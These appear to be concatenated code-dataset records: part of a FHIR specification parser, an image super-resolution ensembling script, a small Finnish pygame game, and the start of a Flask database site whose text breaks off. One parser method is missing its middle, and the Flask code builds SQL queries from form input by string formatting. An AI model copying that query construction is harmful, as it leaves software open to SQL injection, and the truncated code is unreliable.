that is a CodeSystem generating an enum\n\n self.is_main_profile_element = is_main_profile_element\n self.represents_class = False\n\n self._superclass_name = None\n self._name_if_class = None\n self._did_resolve_dependencies = False\n\n if element_dict is not None:\n self.parse_from(element_dict)\n else:\n self.definition = FHIRStructureDefinitionElementDefinition(self, None)\n\n def parse_from(self, element_dict):\n self.path = element_dict[\"path\"]\n parts = self.path.split(\".\")\n self.parent_name = \".\".join(parts[:-1]) if len(parts) > 0 else None\n prop_name = parts[-1]\n if \"-\" in prop_name:\n prop_name = 
\"\".join([n[:1].upper() + n[1:] for n in prop_name.split(\"-\")])\n\n self.definition = FHIRStructureDefinitionElementDefinition(self, element_dict)\n self.definition.prop_name = prop_name\n\n self.n_min = element_dict.get(\"min\")\n self.n_max = element_dict.get(\"max\")\n self.is_summary = element_dict.get(\"isSummary\")\n\n def resolve_dependencies(self):\n if self.is_main_profile_element:\n self.represents_class = True\n if (\n not self.represents_class\n and self.children is not None\n and len(self.children) > 0\n ):\n self.represents_class = True\n if self.definition is not None:\n self.definition.resolve_dependencies()\n\n self._did_resolve_dependencies = True\n\n # MARK: Hierarchy\n\n def add_child(self, element):\n assert isinstance(element, FHIRStructureDefinitionElement)\n element.parent = self\n if self.children is None:\n self.children = [element]\n else:\n self.children.append(element)\n\n def create_class(self, module=None):\n \"\"\" Creates a FHIRClass instance from the receiver, returning the\n created class as the first and all inline defined subclasses as the\n second item in the tuple.\n \"\"\"\n assert self._did_resolve_dependencies\n if not self.represents_class:\n return None, None\n\n subs = []\n cls, did_create = fhirclass.FHIRClass.for_element(self)\n if did_create: # manual_profiles\n if module is None:\n if self.profile.manual_module is not None:\n module = self.profile.manual_module\n elif self.is_main_profile_element:\n module = self.profile.spec.as_module_name(cls.name)\n cls.module = module\n logger.debug('Created class \"{}\", module {}'.format(cls.name, module))\n\n # child classes\n if self.children is not None:\n for child in self.children:\n properties = child.as_properties()\n if properties is not None:\n\n # collect subclasses\n sub, subsubs = child.create_class(module)\n if sub is not None:\n subs.append(sub)\n if subsubs is not None:\n subs.extend(subsubs)\n\n # add properties to class\n if did_create:\n for prop in properties:\n cls.add_property(prop)\n\n return cls, subs\n\n def as_properties(self):\n \"\"\" If the element describes a *class property*, returns a list of\n FHIRClassProperty instances, None otherwise.\n \"\"\"\n assert self._did_resolve_dependencies\n if self.is_main_profile_element or self.definition is None:\n return None\n\n # TODO: handle slicing information (not sure why these properties were\n # omitted previously)\n # if self.definition.slicing:\n # logger.debug('Omitting property \"{}\" for slicing'.format(self.definition.prop_name))\n # return None\n\n # this must be a property\n if self.parent is None:\n raise Exception(\n 'Element reports as property but has no parent: \"{}\"'.format(self.path)\n )\n\n # create a list of FHIRClassProperty instances (usually with only 1 item)\n if len(self.definition.types) > 0:\n props = []\n for type_obj in self.definition.types:\n\n # an inline class\n if (\n \"BackboneElement\" == type_obj.code or \"Element\" == type_obj.code\n ): # data types don't use \"BackboneElement\"\n props.append(\n fhirclass.FHIRClassProperty(self, type_obj, self.name_if_class)\n )\n # TODO: look at http://hl7.org/fhir/StructureDefinition/structuredefinition-explicit-type-name ?\n else:\n props.append(fhirclass.FHIRClassProperty(self, type_obj))\n return props\n\n # no `type` definition in the element: it's a property with an inline class definition\n type_obj = FHIRElementType()\n return [fhirclass.FHIRClassProperty(self, type_obj, self.name_if_class)]\n\n # MARK: Name Utils\n\n def name_of_resource(self):\n 
assert self._did_resolve_dependencies\n if (\n not self.is_main_profile_element\n or self.profile.structure.kind is None\n or self.profile.structure.kind != \"resource\"\n ):\n return None\n return self.profile.name\n\n @property\n def name_if_class(self):\n if self._name_if_class is None:\n self._name_if_class = self.definition.name_if_class()\n return self._name_if_class\n\n @property\n def superclass_name(self):\n \"\"\" Determine the superclass for the element (used for class elements).\n \"\"\"\n if self._superclass_name is None:\n tps = self.definition.types\n if len(tps) > 1:\n raise Exception(\n 'Have more than one type to determine superclass in \"{}\": \"{}\"'.format(\n self.path, tps\n )\n )\n type_code = None\n\n if (\n self.is_main_profile_element\n and self.profile.structure.subclass_of is not None\n ):\n type_code = self.profile.structure.subclass_of\n elif len(tps) > 0:\n type_code = tps[0].code\n elif self.profile.structure.kind:\n type_code = self.profile.spec.generator_config.default_base[\n self.profile.structure.kind\n ]\n self._superclass_name = self.profile.spec.class_name_for_type(type_code)\n\n return self._superclass_name\n\n def __repr__(self):\n return f\"<{self.__class__.__name__}> path: {self.path}\"\n\n\nclass FHIRStructureDefinitionElementDefinition(object):\n \"\"\" The definition of a FHIR element.\n \"\"\"\n\n def __init__(self, element, definition_dict):\n self.id = None\n self.element = element\n self.types = []\n self.name = None\n self.prop_name = None\n self.content_reference = None\n self._content_referenced = None\n self.dstu2_name_reference = None # also set in parse_from; default here avoids AttributeError\n self.short = None\n self.formal = None\n self.comment = None\n self.binding = None\n self.constraint = None\n self.mapping = None\n self.slicing = None\n self.representation = None\n # TODO: extract \"defaultValue[x]\", \"fixed[x]\", \"pattern[x]\"\n # TODO: handle \"slicing\"\n\n if definition_dict is not None:\n self.parse_from(definition_dict)\n\n def parse_from(self, definition_dict):\n self.id = definition_dict.get(\"id\")\n self.types = []\n for type_dict in definition_dict.get(\"type\", []):\n self.types.append(FHIRElementType(type_dict))\n\n self.name = definition_dict.get(\"name\")\n self.content_reference = definition_dict.get(\"contentReference\")\n self.dstu2_name_reference = definition_dict.get(\"nameReference\")\n\n self.short = definition_dict.get(\"short\")\n self.formal = definition_dict.get(\"definition\")\n if (\n self.formal and self.short == self.formal[:-1]\n ): # formal adds a trailing period\n self.formal = None\n self.comment = definition_dict.get(\"comments\")\n\n if \"binding\" in definition_dict:\n self.binding = FHIRElementBinding(definition_dict[\"binding\"])\n if \"constraint\" in definition_dict:\n self.constraint = FHIRElementConstraint(definition_dict[\"constraint\"])\n if \"mapping\" in definition_dict:\n self.mapping = FHIRElementMapping(definition_dict[\"mapping\"])\n if \"slicing\" in definition_dict:\n self.slicing = definition_dict[\"slicing\"]\n self.representation = definition_dict.get(\"representation\")\n\n
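 # NOTE: contentReference/nameReference targets may appear later in the\n # structure, so they are only resolved here, after all elements were parsed.\n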
in {self.profile.url}'\n )\n self._content_referenced = elem.definition\n elif self.dstu2_name_reference is not None: # DSTU-2 backwards-compatibility\n elem = self.element.profile.dstu2_element_with_name(\n self.dstu2_name_reference\n )\n if elem is None:\n raise Exception(\n f'There is no element definiton with name \"{self.dstu2_name_reference}\", as referenced by {self.path} in {self.profile.url}'\n )\n self._content_referenced = elem.definition\n\n # resolve bindings\n if (\n self.binding is not None\n and self.binding.is_required\n and self.binding.has_valueset\n ):\n uri = self.binding.valueset_uri\n if not uri.startswith(\"http://hl7.org/fhir\"):\n logger.debug('Ignoring foreign ValueSet \"{}\"'.format(uri))\n return\n\n # remove version from canonical URI, if present, e.g. \"http://hl7.org/fhir/ValueSet/name-use|4.0.0\"\n uri = uri.split(\"|\")[0]\n\n valueset = self.element.profile.spec.valueset_with_uri(uri)\n if valueset is None:\n logger.error(\n 'There is no ValueSet for required binding \"{}\" on {} in {}'.format(\n uri, self.name or self.prop_name, self.element.profile.name\n )\n )\n else:\n self.element.valueset = valueset\n self.element.enum = valueset.enum\n\n def name_if_class(self):\n \"\"\" Determines the class-name that the element would have if it was\n defining a class. This means it uses \"name\", if present, and the last\n \"path\" component otherwise. It also detects if the definition is a\n reference and will re-use the class name defined by the referenced\n element (such as `ValueSet.codeSystem.concept.concept`).\n \"\"\"\n\n # This Element is a reference, pick up the original name\n if self._content_referenced is not None:\n return self._content_referenced.name_if_class()\n\n with_name = self.name or self.prop_name\n parent_name = (\n self.element.parent.name_if_class\n if self.element.parent is not None\n else None\n )\n classname = self.element.profile.spec.class_name_for_type(\n with_name, parent_name\n )\n if (\n parent_name is not None\n and self.element.profile.spec.generator_config.naming_rules.backbone_class_adds_parent\n ):\n classname = parent_name + classname\n return classname\n\n\nclass FHIRElementType(object):\n \"\"\"Representing a type of an element.\n\n https://www.hl7.org/fhir/element.html\n \"\"\"\n\n def __init__(self, type_dict=None):\n self.code = None\n self.profile = None\n\n if type_dict is not None:\n self.parse_from(type_dict)\n\n def parse_from(self, type_dict):\n self.code = type_dict.get(\"code\")\n\n # Look for the \"structuredefinition-fhir-type\" extension, introduced after R4\n ext_type = type_dict.get(\"extension\")\n\n # http://hl7.org/fhir/2020Feb/extensibility.html#Extension\n if ext_type is not None:\n fhir_ext = [\n e\n for e in ext_type\n if e.get(\"url\")\n == \"http://hl7.org/fhir/StructureDefinition/structuredefinition-fhir-type\"\n ]\n if len(fhir_ext) == 1: # This may hit after R4\n if \"valueUri\" in fhir_ext[0]:\n self.code = fhir_ext[0].get(\"valueUri\")\n if \"valueUrl\" in fhir_ext[0]:\n self.code = fhir_ext[0].get(\"valueUrl\")\n\n # This may hit on R4 or earlier\n ext_code = type_dict.get(\"_code\")\n if self.code is None and ext_code is not None:\n json_ext = [\n e\n for e in ext_code.get(\"extension\", [])\n if e.get(\"url\")\n == \"http://hl7.org/fhir/StructureDefinition/structuredefinition-json-type\"\n ]\n if len(json_ext) < 1:\n raise Exception(\n f'Expecting either \"code\" or \"_code\" and a JSON type extension, found neither in {type_dict}'\n )\n if len(json_ext) > 1:\n raise Exception(\n f\"Found 
more than one structure definition JSON type in {type_dict}\"\n )\n self.code = json_ext[0].get(\"valueString\")\n\n if self.code is None:\n raise Exception(f\"No element type code found in {type_dict}\")\n if not isinstance(self.code, str):\n raise Exception(\n \"Expecting a string for 'code' definition of an element type, got {} as {}\".format(\n self.code, type(self.code)\n )\n )\n if not isinstance(type_dict.get(\"targetProfile\"), (list,)):\n self.profile = type_dict.get(\"targetProfile\")\n if (\n self.profile is not None\n and not isinstance(self.profile, str)\n and not isinstance(type_dict.get(\"targetProfile\"), (list,))\n ): # Added a check to make sure the targetProfile wasn't a list\n raise Exception(\n \"Expecting a string for 'targetProfile' definition of an element type, got {} as {}\".format(\n self.profile, type(self.profile)\n )\n )\n\n\nclass FHIRElementBinding(object):\n \"\"\" The \"binding\" element in an element definition\n \"\"\"\n\n def __init__(self, binding_obj):\n self.strength = binding_obj.get(\"strength\")\n self.description = binding_obj.get(\"description\")\n self.valueset = binding_obj.get(\"valueSet\")\n self.legacy_uri = binding_obj.get(\"valueSetUri\")\n self.legacy_canonical = binding_obj.get(\"valueSetCanonical\")\n self.dstu2_reference = binding_obj.get(\"valueSetReference\", {}).get(\"reference\")\n self.is_required = \"required\" == self.strength\n\n @property\n def has_valueset(self):\n return self.valueset_uri is not None\n\n @property\n def valueset_uri(self):\n return (\n self.valueset\n or self.legacy_uri\n or self.legacy_canonical\n or self.dstu2_reference\n )\n\n\nclass FHIRElementConstraint(object):\n \"\"\" Constraint on an element.\n \"\"\"\n\n def __init__(self, constraint_arr):\n pass\n\n\nclass FHIRElementMapping(object):\n \"\"\" Mapping FHIR to other standards.\n \"\"\"\n\n def __init__(self, mapping_arr):\n pass\n","sub_path":"fhirzeug/fhirspec.py","file_name":"fhirspec.py","file_ext":"py","file_size_in_byte":45430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"307075980","text":"from FAWDN.test import main as FAWDN\nimport cv2\nimport multiprocessing as mp\nimport os\nfrom multiprocessing import Process\nimport numpy as np\nfrom FAWDN.utils import util\nimport csv\nimport time\nimport pickle\n\ndef start_FAWDN(lrpath, hrpath, modelpath,modelresulsts, modelnames, modelpsnr):\n # starts the fawdn test.py script and saves the results and which model produced them in lists\n srimages, srpsnr = FAWDN(lrpath, hrpath,modelpath)\n modelresulsts.append(srimages)\n modelpsnr.append(srpsnr)\n modelnames.append(modelpath.rsplit('/',1)[1]) #keeps track of when the models finished\n\ndef compute_weigths(path_to_jsonfolder):\n # finds the cvs files in the directory and means the psnr values for each file\n excelfiles = [excel for excel in os.listdir(path_to_jsonfolder) if excel.endswith('.csv')]\n meanpsnr=[]\n for file in excelfiles:\n filepsnr=[]\n with open(path_to_jsonfolder+\"/\"+file, mode='r', encoding=\"utf8\") as csv_file:\n csv_reader = csv.DictReader(csv_file)\n for row in csv_reader:\n if row is not None:\n filepsnr.append(row[\"psnr\"])\n filepsnr = np.array(filepsnr).astype(np.float)\n t = np.mean(filepsnr),file\n meanpsnr.append(t)\n\n return meanpsnr # contains a list of (meanpsnr, modelname) for each csv file\n\n\n\ndef sortweigths(weigths, modelnames):\n # matches the results of models with their weigths, so the weights appear in the order the models finished in\n 
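# --- Illustrative aside, not part of the original source -----------------
# A self-contained sketch of the weighted-average idea that
# average_ensemble() below implements: model outputs are stacked and
# averaged with per-model weights, normalized by the best (maximum) value
# exactly as in the original. All numbers here are toy values.
import numpy as np

outputs = np.stack([np.full((2, 2, 3), v, dtype=np.float64) for v in (100, 120, 140)])
psnr = np.array([30.0, 32.5, 31.0])          # one mean validation PSNR per model
weights = psnr / psnr.max()                  # normalize by the best model
fused = np.average(outputs, weights=weights, axis=0)
print(fused.astype('uint8')[0, 0])           # -> roughly [120 120 120]
# --------------------------------------------------------------------------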
sortedweigths=[]\n for n1 in modelnames:\n #n1 = first_word(n1, 1)\n n1 = n1.rsplit('.',1)[0]\n for i in range(0, len(weigths)):\n n2 = weigths[i][1]\n #n2 = first_word(n2, 1)\n n2 = n2.rsplit('_',1)[0]\n\n if n1 == n2:\n sortedweigths.append(weigths[i][0])\n break\n else: # for-else: runs only when no csv file matched this model (the old `elif i==len(weigths)` could never be true inside the loop)\n print("did not match a csv file with model", n1, ". Make sure csv file is named _records.csv")\n return sortedweigths\n\ndef average_ensemble(sortedweigths, images):\n # average the models' images together based on the weight of each model\n norm_psnr = []\n\n for value in sortedweigths:\n y = value / (np.amax(sortedweigths))\n norm_psnr.append(y)\n imgs = np.array(images)\n print(norm_psnr)\n print(modelnames)\n mean_img = np.average(imgs, weights=norm_psnr, axis=0) # uses weights from validation testing\n #mean_img = imgs.mean(axis=0) # uses no weights\n mean_img = mean_img.astype('uint8')\n return mean_img\n\n\ndef voting_ensemble(sortedweigths, images):\n # Majority voting: each pixel is compared to the same pixel in the other models' images;\n # the majority decides which value the pixel should hold\n height, width = images[0].shape[0], images[0].shape[1] # was len(images[0]) twice, which used the row count for both axes\n ensembleimage = 255 * np.ones((height, width, 3), np.uint8) # was hard-coded to 512x512\n # for each pixel (x indexes rows, y indexes columns, matching modelImage[x, y])\n for x in range(height):\n for y in range(width):\n # get the pixel in all images\n pixelList = []\n for modelImage in images:\n pixel = modelImage[x, y]\n pixelList.append(pixel)\n # print(pixelList)\n\n votes = [0] * len(pixelList) # one vote counter per model (was the global modelresults)\n # compare each pixel with the next pixels in the list\n for numbervote in range(len(pixelList)):\n pixel1 = pixelList[numbervote]\n result = len(votes) > 0 and any(elem > 2 for elem in votes) # if any pixel gets more than two votes, it has won\n if result:\n break\n for numbervote2 in range(numbervote + 1, len(pixelList)): # compare 0 with 1,2,3,4,5, 1 with 2,3,4,5, 2 with 3,4,5 etc.\n pixel2 = pixelList[numbervote2]\n if np.allclose(pixel1, pixel2):\n votes[numbervote] += 1\n if votes[numbervote] > 2: # if the pixel has more than two votes we don't need to compare any more\n break\n # print(votes)\n maxIndexList = [i for i, j in enumerate(votes) if j == max(votes)]\n votesareequal = len(votes) > 0 and all(elem == votes[0] for elem in votes)\n\n if votesareequal: # if all the pixels have the same amount of votes, pick the one with the highest weight\n\n winningvote = sortedweigths.index(max(sortedweigths))\n # print("weigthdecier", winningvote)\n elif len(maxIndexList) > 1: # if some pixels have the same amount of votes, pick the one from the model with the highest weight\n highestweight = 0\n winningvalue = 0\n for value in maxIndexList:\n weigth = sortedweigths[value]\n if weigth > highestweight:\n highestweight = weigth\n winningvalue = value\n winningvote = winningvalue # index of the winning model (was votes[winningvalue], which indexed pixelList with a vote count)\n\n else: # one pixel has the highest amount of votes\n winningvote = votes.index(max(votes))\n\n # print("winning vote index", winningvote)\n finalpixel = pixelList[winningvote]\n ensembleimage[x, y] = finalpixel # put the winning pixel in the ensemble image\n return ensembleimage\n\n\ndef compute_ensemble(HRpath, weigths, type="average"):\n # goes through each resulting image from the models and computes a single ensemble image from them based on type\n hrimages = [image for image in os.listdir(HRpath) if image.endswith('.png')]\n ensemblepsnr, ensembleimages, ensembletime = [], [], []\n\n for hrimagenumber in range(0, len(hrimages)): # there is one result for each model for each HR image they tested on\n start = time.time()\n images=[]\n\n for i in range(0, 
len(modelresults)):\n images.append(modelresults[i][hrimagenumber]) # gets SR result of model number i for testing image number hrimagenumber\n sortedweigths = sortweigths(weigths, modelnames)\n\n if type == \"average\":\n ensembleimage = average_ensemble(sortedweigths, images)\n elif type == \"voting\":\n print(\"Starting vote on image\", hrimagenumber+1)\n ensembleimage = voting_ensemble(sortedweigths, images)\n else:\n print(\"Wrong ensemble type\")\n return None\n ensembletime.append(time.time()-start)\n ensembleimages.append(ensembleimage)\n hr = cv2.imread(HRpath + \"/\" + hrimages[hrimagenumber]) # read the HR image to compare with emsemble image\n psnr, ssim = util.calc_metrics(ensembleimage, hr, crop_border=2) # computes psnr/ssim value of the ensemble\n ensemblepsnr.append((psnr,ssim))\n\n return ensembleimages,ensemblepsnr,ensembletime # returns lists of all the ensemble images and their psnr value\n\ndef perimageresults(modelresults,modelnames,modelpsnr):\n # prints the collected models results for each hr image in one line per image\n hrimages = [image for image in os.listdir(HRpath) if image.endswith('.png')]\n with open(os.getcwd()+ '/FAWDN/results/Modelpics/model.csv', 'w') as csvfile:\n writer = csv.writer(csvfile, delimiter=';')\n for hrimagenumber in range(0, len(hrimages)):\n printtext = hrimages[hrimagenumber] +\" PSNR/SSIM: \"\n averagepsnr = []\n averagessim = []\n for i in range(0, len(modelresults)):\n #print(modelpsnr)\n #print(modelpsnr[i][hrimagenumber])\n psnr = modelpsnr[i][0][hrimagenumber] # [which model][psnr or ssim][image number]\n ssim = modelpsnr[i][1][hrimagenumber] # ssim\n averagepsnr.append(psnr)\n averagessim.append(ssim)\n\n #psnr, ssim = modelpsnr[0][i][hrimagenumber]\n printtext +=str(modelnames[i])+\" \" + str(round(psnr, 2)) +\" / \"+ str(round(ssim, 2)) + \" || \"\n writer.writerow((modelnames[i], str(round(psnr, 2)), str(round(ssim, 2))))\n\n printtext += \" Average \" + str(round(np.mean(averagepsnr), 2))+\" / \"+str(round(np.mean(averagessim), 2))\n averagepsnr= str(np.mean(averagepsnr))\n averagessim = str(np.mean(averagessim))\n writer.writerow((\"Average\",averagepsnr,averagessim ))\n print(printtext)\n\n\ndef start_processes(json_files):\n # starts an amount of processes equal the amount of models provided\n processes= []\n for model in json_files:\n print(\"Running \", model)\n p = Process(target=start_FAWDN, args=(LRpath, HRpath, path_to_jsonfolder + model, modelresults, modelnames, modelpsnr))\n p.start()\n processes.append(p)\n return processes\n\n\nif __name__ == '__main__':\n manager = mp.Manager()\n modelresults, modelnames, modelpsnr = manager.list(), manager.list(), manager.list()\n #sharedlistnames = manager.list()\n\n\n path_to_jsonfolder = os.getcwd()+\"/FAWDN/options/final/\" # current working directoy C:\\Users\\tobia\\Documents\\GitHub\\VGIS8\\\n LRpath = os.getcwd()+\"/FAWDN/results/test/lr\"\n HRpath = os.getcwd()+\"/FAWDN/results/test/hr\"\n\n json_files = [pos_json for pos_json in os.listdir(path_to_jsonfolder) if pos_json.endswith('.json')]\n processes = start_processes(json_files)\n\n for p in processes:\n p.join() #wait for all the processes to finish\n\n weigths = compute_weigths(path_to_jsonfolder)\n\n ensembleimages, ensemblepsnr, ensembletime = compute_ensemble(HRpath,weigths, type=\"voting\") #type = \"average\" or \"voting\"\n\n # show and save the ensemble results\n with open(os.getcwd()+ '/FAWDN/results/Ensemble/ensemble.csv', 'w') as csvfile:\n writer = csv.writer(csvfile, delimiter=';')\n for y in range 
(0,len(ensembleimages)):\n cv2.imshow(str(y), ensembleimages[y])\n path=os.getcwd()+\"/FAWDN/results/Ensemble/\"+str(y+1)\n cv2.imwrite(path+\".png\", ensembleimages[y])\n psnr, ssim = ensemblepsnr[y]\n print(\"Ensemble image number\" ,str(y+1), \"PSNR/SSIM:\",round(psnr,2),\"/\",round(ssim,2), \"computation time:\" ,ensembletime[y])\n psnr = str(round(psnr,2))\n ssim = str(round(ssim, 2))\n writer.writerow((y+1,psnr, ssim))\n\n perimageresults(modelresults, modelnames, modelpsnr)\n #print(\"ensemble psnr/ssim\", psnr, ssim)\n\n # show and save the individual models results\n for i in range(0,len(modelresults)):\n for j in range(0,len(modelresults[i])):\n path =os.getcwd()+\"/FAWDN/results/Modelpics/\"+str(modelnames[i])+\"imagenum\"+str(j+1)\n cv2.imshow(str(modelnames[i])+\"imagenum\"+str(j+1), modelresults[i][j])\n cv2.imwrite(path+\".png\",modelresults[i][j])\n cv2.waitKey(0)\n","sub_path":"Ensemble.py","file_name":"Ensemble.py","file_ext":"py","file_size_in_byte":10682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"591367372","text":"#Vihollispeli\nimport pygame\nimport random\n\nnaytto = pygame.display.set_mode((640, 400)) \npygame.display.set_caption(\"Piirtäminen\")\n\ndef piirtaminen(naytto, hahmot, viholliset): \n naytto.fill((0, 0, 0))\n for hahmo in hahmot:\n if hahmo[3] == True:\n kuva = pygame.image.load(hahmo[0]).convert()\n naytto.blit(kuva, (hahmo[1], hahmo[2]))\n for vihollinen in viholliset:\n if vihollinen[3] == True:\n kuva = pygame.image.load(vihollinen[0]).convert()\n naytto.blit(kuva, (vihollinen[1], vihollinen[2])) \n pygame.display.flip()\n\ndef kontrolli(hahmot, tapahtuma, viholliset): \n for vihollinen in viholliset: \n hahmo = hahmot[0]\n if (vihollinen[1] == hahmo[1]) and (vihollinen[2] == hahmo[2]): \n del hahmot[0] \n if tapahtuma.type == pygame.KEYDOWN:\n if tapahtuma.key == pygame.K_SPACE:\n for hahmo in hahmot:\n hahmo[3] = True \n for vihollinen in viholliset:\n vihollinen[3] = True\n elif tapahtuma.key == pygame.K_RIGHT:\n päähahmo = hahmot[0]\n päähahmo[1] += 10 \n elif tapahtuma.key == pygame.K_LEFT:\n päähahmo = hahmot[0] \n päähahmo[1] += -10\n elif tapahtuma.key == pygame.K_DOWN: \n päähahmo = hahmot[0]\n päähahmo[2] += 10 \n elif tapahtuma.key == pygame.K_UP:\n päähahmo = hahmot[0]\n päähahmo[2] += -10 \n else: \n return \n\ndef main():\n kissahahmo = [\"cat.png\", 0, 0, False]\n sotilashahmo = [\"Sotilas.png\", 100, 0, False] \n hahmot = [kissahahmo, sotilashahmo]\n vihollinen1 = [\"Animaatiosotilas.png\", 150, 200, True] \n vihollinen2 = [\"Animaatiosotilaat.png\", 350, 200, True]\n vihollinen3 = [\"Vihollinen.jpg\", 550, 200, True] \n viholliset = [vihollinen1, vihollinen2, vihollinen3] \n while True:\n tapahtuma = pygame.event.poll()\n if tapahtuma.type == pygame.QUIT:\n break \n for vihollinen in viholliset:\n #del hahmot[0] \n \n if vihollinen[1] > 640:\n vihollinen[1] = 0 \n vihollinen[2] = random.randint(0, 400)\n else:\n vihollinen[1] += 0.5\n \n kontrolli(hahmot, tapahtuma, viholliset)\n piirtaminen(naytto, hahmot, viholliset) \nmain() \n","sub_path":"ESIMERKIT/Tietokantataulu.py","file_name":"Tietokantataulu.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"61380250","text":"# makers: Sanne en Inge\r\n# de benodigde python code om de website te laten werken en de goeie resultaten te krijgen\r\n\r\nfrom flask import Flask, render_template, request\r\nimport mysql.connector\r\nimport 
re\r\nfrom Bio.Blast import NCBIWWW, NCBIXML\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n@app.route('/', methods=['get', 'post'])\r\ndef home():\r\n """ This function returns an html template\r\n \r\n :return render template of Database_page2.html, shows the home page\r\n """\r\n return render_template('Database_page2.html')\r\n\r\n\r\n@app.route('/results', methods=['get', 'post'])\r\ndef results_filters():\r\n """ This function has 2 lists, 1 list for the columns and 1 list for all checkboxes. It walks over every checkbox\r\n to see whether it has a value; if so, the value is added to a new list. After that,\r\n functions are called for the filters and the values. If no column filter was applied, the list of\r\n columns is returned; if columns were filtered, that list is returned instead. The accession codes are\r\n also retrieved\r\n\r\n :return list lijst_kolommen if no column filter was applied, together with the other filters, accessie_index and resultaat\r\n :return list resultaat_kolommen if columns were filtered, together with the other filters, resultaat and\r\n accessie_index\r\n """\r\n # lists with the values of the possible filter options; they are hard-coded in the script because of tables we do\r\n # not want to show, and they consist of the values of the checkboxes\r\n lijst = ["checkboxOne", "checkboxTwo", "checkboxThree", "checkboxFour", "checkboxFive", "checkboxSix",\r\n "checkboxSeven", "checkboxEight", "checkboxNine", "checkboxTen", "checkboxEleven", "checkboxTwelve",\r\n "checkboxThirteen", "checkboxFourteen", "checkboxFifteen", "checkboxSixteen"]\r\n lijst_kolommen = ["Blast_type", "Score", "Query_cover", "Percent_ident", "E_value", "Accessiecode", "Organisme",\r\n "Taxonomie", "Read_type", "Sequentie", "Prot_naam"]\r\n resultaat_kolommen = []\r\n # the filter steps that build the right lists with the values for the queries\r\n for item in lijst:\r\n result = request.form.get(item)\r\n if result is not None:\r\n resultaat_kolommen.append(result)\r\n\r\n resultaat_where = filters()\r\n e_value, score, percentidentity, querycover = waardes_getallen()\r\n resultaat_where_ = filters_getallen(resultaat_where, e_value, score, percentidentity, querycover)\r\n # this function is called to execute the queries\r\n resultaat = result_querys(lijst_kolommen, resultaat_kolommen, resultaat_where_)\r\n # depending on whether columns were filtered you get a different return\r\n accesie_index = lijst_kolommen.index("Accessiecode")\r\n if len(resultaat_kolommen) == 0:\r\n return render_template('results.html', accesie_index=accesie_index, data=resultaat, lijst=lijst_kolommen)\r\n if len(resultaat_kolommen) != 0:\r\n return render_template('results.html', data=resultaat, lijst=resultaat_kolommen)\r\n\r\n\r\ndef filters():\r\n """ Deze functie heeft een lijst met waardes waar op gefilterd kan worden. 
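# --- Illustrative aside, not part of the original source -----------------
# The routes above build SQL by interpolating user input with .format(),
# which is open to SQL injection. A hedged sketch of the parameterized
# alternative with mysql.connector (table and column names are taken from
# the original queries; the cursor is assumed to exist):
def safe_organism_filter(cursor, organisme):
    query = ("select Blast_type, Score, Organisme from blast "
             "where Organisme like %s")
    # the driver escapes the value; Python only builds the wildcard text
    cursor.execute(query, ("%" + organisme + "%",))
    return cursor.fetchall()
# --------------------------------------------------------------------------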
Deze worden nagelopen of deze een waarde\r\n hebben, als dat zo is wordt deze toegevoegd in een nieuwe lijst dat deze door een query zo kan worden uitgevoerd,\r\n als de lijst leeg is, wordt er nog 'where' toegvoegd in de zin.\r\n\r\n :return lijst met alle filters waar op gefilterd kan worden\r\n \"\"\"\r\n resultaat_where = []\r\n lijst_filters = [\"organisme\", \"eiwit\", \"checkboxread1\", \"checkboxread2\", \"checkboxread3\",\r\n \"checkboxblastx\", \"checkboxtblastx\", \"checkboxboth\"]\r\n # de reden waarom hier vanaf index 1 2 opties worden gegeven is vanwege dat je bij de eerste een where hebt staan\r\n # voor de query anders werkt die niet, dan is de keuze steeds of er een where komt te staan of niet een where\r\n # wat afhankelijk is van de lengte van de lijst\r\n for item in lijst_filters:\r\n index_getal = lijst_filters.index(item)\r\n result = request.form.get(item)\r\n if result is not None:\r\n if len(result) > 0:\r\n if index_getal == 0:\r\n resultaat_where.append(\"where Organisme like '%{}%'\".format(result))\r\n if index_getal == 1:\r\n if len(resultaat_where) > 1:\r\n resultaat_where.append(\"Prot_naam like '%{}%'\".format(result))\r\n elif len(resultaat_where) == 0:\r\n resultaat_where.append(\"where Prot_naam like '%{}%'\".format(result))\r\n if index_getal == 2 or index_getal == 3:\r\n if len(resultaat_where) > 0:\r\n resultaat_where.append(\"Read_type = {}\".format(result))\r\n if len(resultaat_where) == 0:\r\n resultaat_where.append(\"where Read_type = {}\".format(result))\r\n if index_getal == 4:\r\n if len(resultaat_where) > 0:\r\n resultaat_where.append(\"{}\".format(result))\r\n if len(resultaat_where) == 0:\r\n resultaat_where.append(\"where {}\".format(result))\r\n if index_getal == 5 or index_getal == 6:\r\n if len(resultaat_where) > 0:\r\n resultaat_where.append(\"Blast_type = {}\".format(result))\r\n if len(resultaat_where) == 0:\r\n resultaat_where.append(\"where Blast_type = {}\".format(result))\r\n if index_getal == 7:\r\n if len(resultaat_where) > 0:\r\n resultaat_where.append(\"{}\".format(result))\r\n if len(resultaat_where) == 0:\r\n resultaat_where.append(\"where {}\".format(result))\r\n\r\n return resultaat_where\r\n\r\n\r\ndef waardes_getallen():\r\n \"\"\" Deze functie maakt een lijst aan voor getallen waar op gefilterd kan worden. 
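# --- Illustrative aside, not part of the original source -----------------
# filters() above repeats the "prepend where only for the first clause"
# decision for every checkbox. The same effect can be produced once, at
# join time, as in this small sketch (result_querys() already joins the
# collected clauses with " and "):
def build_where(clauses):
    # [] -> "";  ["a", "b"] -> "where a and b"
    return "where " + " and ".join(clauses) if clauses else ""

assert build_where([]) == ""
assert build_where(["Read_type = 1", "Blast_type = 2"]) == "where Read_type = 1 and Blast_type = 2"
# --------------------------------------------------------------------------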
